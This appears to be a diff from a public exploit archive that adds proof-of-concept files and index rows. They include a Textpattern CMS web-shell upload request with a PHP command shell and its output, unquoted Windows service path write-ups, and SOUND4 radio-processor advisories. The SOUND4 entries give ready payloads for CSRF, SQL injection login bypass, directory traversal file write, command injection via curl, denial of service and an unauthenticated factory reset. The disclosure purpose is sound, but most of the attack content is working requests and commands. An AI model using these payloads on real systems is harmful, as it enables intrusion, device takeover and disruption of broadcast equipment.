# Version : 4.8.8
# Tested on: windows 11 xammp | Kali linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
# Step 1: Login admin account and go settings of site
# Step 2: Upload a file to web site and selecet the rce.php
# Step3 : Upload your webshell that's it...
#
######## Proof of Concept ########
========>>> START REQUEST <<<=========
############# POST REQUEST (FILE UPLOAD) ############################## (1)
POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"
1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"
async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"
file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"
file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"
16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--
############ POST RESPONSE (FILE UPLOAD) ######### (1)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8
___________________________________________________________________________________________________________________________________________________
############ REQUEST TO THE PAYLOAD ############################### (2)
GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close
############ RESPONSE THE PAYLOAD ############################### (2)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>alpernae\alperen
</pre>
========>>> END REQUEST <<<=========

32
exploits/windows/local/51159.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path
# Date: 11/17/2022
# Exploit Author: Damian Semon Jr (Blue Team Alpha)
# Version: 1.8.5
# Vendor Homepage: https://masterplus.coolermaster.com/
# Software Link: https://masterplus.coolermaster.com/
# Tested on: Windows 10 64x
# Step to discover the unquoted service path:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
CoolerMaster MasterPlus Technology Service MPService C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe Auto
# Info on the service:
C:\>sc qc MPService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MPService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CoolerMaster MasterPlus Technology Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger.
Ex: (C:\Program.exe)

61
exploits/windows/local/51167.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: 4.1.102
Summary: SOUND4 Windows Server Service.
Desc: The application suffers from an unquoted search path issue impacting
the service 'SOUND4 Server' for Windows. This could potentially allow an
authorized but non-privileged local user to execute arbitrary code with
elevated privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path undetected
by the OS or other security applications where it could potentially be executed
during application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.
Tested on: Windows 10 Home 64 bit (build 9200)
SOUND4 Server v4.1.102
SOUND4 Remote Control v4.3.17
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5721
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php
26.09.2022
--
C:\>sc qc "SOUND4 Server"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SOUND4 Server
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SOUND4 Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe"
C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V
4.1.102

69
exploits/windows/local/51168.txt Normal file
View file

@ -0,0 +1,69 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5722
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php
26.09.2022
--
PoC:
----
<form action="http://RADIO/cgi-bin/logoremove.cgi" method="POST">
<input type="submit" value="Disappear" />
</form>

165
exploits/windows/local/51169.txt Normal file
View file

@ -0,0 +1,165 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR)
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application is vulnerable to insecure direct object references
that occur when the application provides direct access to objects based
on user-supplied input. As a result of this vulnerability attackers can
bypass authorization and access the hidden resources on the system and
execute privileged functionalities.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5723
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php
26.09.2022
--
(GET|POST) /** HTTP/1.1
/var/www/:
----------
.SOUND4
about.php
actioninprogress.php
broken_error.php
cfg_filewatch.xml
cfg_filewatch_specific.xml
checklogin.php
checkserver.php
config.php
datahandlerdlg.php
descrxml.php
dns.php
downloads
downloads.php
fullrebootsystem.php
global.php
globaljs.php
guifactorysettings.xml
guixml.php
guixml_error.php
header.php
images
index.php
isreboot.php
jquery-3.2.1.min.js
jquery-plugins
jquery-ui-custom
jquery-ui-i18n.js
jquery-ui.css
jquery-ui.js
jquery.js
jquery.ui.touch-punch.min.js
killffmpeg.php
linkandshare.php
login.php
logout.php
monitor.php
networkdiagnostic.php
partialrebootsystem.php
ping.php
playercfg.xml
rebootsystem.php
restoreinprogress.php
script.min.js
secure.php
serverinprogress.php
settings.php
setup.php
setup_ethernet.php
style.min.css
traceroute.php
upgrade
upgrade.php
upgradeinprogress.php
uploaded_guicustomload.php
uploaded_kantarlic.php
uploaded_licfile.php
uploaded_logo.php
uploaded_presetfile.php
uploaded_restorefile.php
uploaded_upgfile.php
validate_tz.php
ws.min.js
ws.php
wsjquery-class.min.js
www-data-handler.php
/usr/cgi-bin/:
--------------
(GET|POST) /** HTTP/1.1
backup.cgi
cgi-form-data
downloadkantarlic.cgi
ffmpeg.cgi
frontpanel
getlogs.cgi
getlogszip.cgi
guicustomsettings.cgi
guicustomsettingsload.cgi
guifactorysettings.cgi
importpreset.cgi
loghandler.php
logo
logoremove.cgi
logoupload.cgi
phptail.php
printenv
printenv.vbs
printenv.wsf
restore.cgi
restorefactory.cgi
test-cgi
upgrade.cgi
upload.cgi

74
exploits/windows/local/51170.txt Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS)
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application allows an unauthenticated attacker to disconnect the
current monitoring user from listening/monitoring and takeover the radio
stream on a specific channel.
------------------------------------------------------------------------
/var/www/killffmpeg.php:
------------------------
01: <?php
02: $ret=0;
03: exec("bash -c 'kill $(cat /tmp/webplay.pid)'",$out,$ret);
04: echo $ret;
05: ?>
------------------------------------------------------------------------
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5725
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php
26.09.2022
--
> curl -sko -nul https://RADIO/killffmpeg.php

67
exploits/windows/local/51171.txt Normal file
View file

@ -0,0 +1,67 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application suffers from an SQL Injection vulnerability. Input
passed through the 'password' POST parameter in 'index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This
can be exploited to manipulate SQL queries by injecting arbitrary SQL code
and bypass the authentication mechanism.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5726
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php
26.09.2022
--
POST /index.php HTTP/1.1
username=t00t&password='+joxy--+z

80
exploits/windows/local/51172.txt Normal file
View file

@ -0,0 +1,80 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application suffers from an unauthenticated directory traversal
file write vulnerability. Input passed through the 'filename' POST parameter
called by the 'upgrade.php' script is not properly verified before being used
to upload .upgbox Firmware files. This can be exploited to write to arbitrary
locations on the system via directory traversal attacks.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5730
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php
26.09.2022
--
POST /cgi-bin/upload.cgi HTTP/1.1
Host: RAAAADIOOO
Content-Type: multipart/form-data; boundary=----zzzzz
User-Agent: TheViewing/05
Accept-Encoding: gzip, deflate
------zzzzz
Content-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned"
Content-Type: application/octet-stream
t00t
------zzzzz
Content-Disposition: form-data; name="submit"
Do it
------zzzzz--

75
exploits/windows/local/51173.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application suffers from an unauthenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary shell
commands through the 'password' HTTP POST parameter through index.php and
login.php script.
========================================================================
/var/www/login.php:
-------------------
09: if (isset($_POST['username']) && isset($_POST['password'])) {
10:
11: $ret = -1;
12: // remarque: Check Password for broken, only admin/admin as valid user/password
13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);
========================================================================
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5738
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php
26.09.2022
--
> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/g
uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

68
exploits/windows/local/51174.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The device allows unauthenticated attackers to visit the unprotected
/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factory
default configuration. Once a POST request is made, the device will reboot
with its default settings allowing the attacker to bypass authentication
and take full control of the system.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5742
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php
26.09.2022
--
> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \
> sleep 120
#login admin:admin

22
files_exploits.csv
View file

@ -924,6 +924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443,2018-02-16,2018-02-28,1,CVE-2016-6272,,,,,
34864,exploits/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",webapps,asp,443,2014-10-02,2014-10-02,0,CVE-2014-4312;OSVDB-114150;OSVDB-112471;OSVDB-112470;OSVDB-112469;OSVDB-112467;OSVDB-112466;OSVDB-112465;CVE-2014-4311;OSVDB-112464,,,,,
27844,exploits/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - 'Moreinfo.asp' Cross-Site Scripting",2006-05-09,Dj_Eyes,webapps,asp,,2006-05-09,2013-08-25,1,CVE-2006-2306;OSVDB-25330,,,,,https://www.securityfocus.com/bid/17907/info
51154,exploits/asp/webapps/51154.txt,"EQ Enterprise management system v2.2.0 - SQL Injection",2023-03-31,TLF,webapps,asp,,2023-03-31,2023-03-31,0,CVE-2022-45297,,,,,
17375,exploits/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,webapps,asp,,2011-06-09,2011-06-09,1,,,,,,
7801,exploits/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,webapps,asp,,2009-01-15,,1,OSVDB-51456;CVE-2009-0252,,,,,
11023,exploits/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,webapps,asp,,2010-01-05,,1,OSVDB-61596;CVE-2010-1064,,,,,
@ -3142,6 +3143,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,,2019-04-22,2019-04-22,0,CVE-2019-7181,,,,,
40985,exploits/hardware/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,hardware,,2017-01-02,2018-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-91824-am.png,,https://www.securityfocus.com/archive/1/539978
41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS Devices - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,,2017-02-01,2022-11-21,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/QNAP%20NVR%20NAS%20Heap%20-%20Stack%20-%20Heap%20Feng%20Shui%20overflow%20and%20%22Heack%20Combo%22%20to%20pwn.txt
51157,exploits/hardware/dos/51157.py,"qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)",2023-03-31,"Krzysztof Burghardt",dos,hardware,,2023-03-31,2023-03-31,0,CVE-2022-46770,,,,,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware,,2018-01-23,2018-01-23,0,CVE-2018-5319,,,,,
11597,exploits/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,dos,hardware,,2010-02-27,,0,CVE-2010-1544;OSVDB-62713,,,,,
23672,exploits/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Denial of Service",2004-02-09,"Bruno Morisson",dos,hardware,,2004-02-09,2012-12-25,1,CVE-2004-2078;OSVDB-3891,,,,,https://www.securityfocus.com/bid/9618/info
@ -3302,6 +3304,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9066,exploits/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure",2009-07-01,Septemb0x,remote,hardware,,2009-06-30,,1,OSVDB-55548;CVE-2009-2306,,,,,
32440,exploits/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,remote,hardware,22,2014-03-22,2014-03-22,1,OSVDB-104652,"Metasploit Framework (MSF)",,,,
50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",2021-07-16,Gr33nh4t,remote,hardware,,2021-07-16,2021-07-16,0,CVE-2021-25155,,,,,
51155,exploits/hardware/remote/51155.sh,"ASKEY RTF3505VW-N1 - Privilege Escalation",2023-03-31,"Leonardo Nicolas Servalli",remote,hardware,,2023-03-31,2023-03-31,0,,,,,,
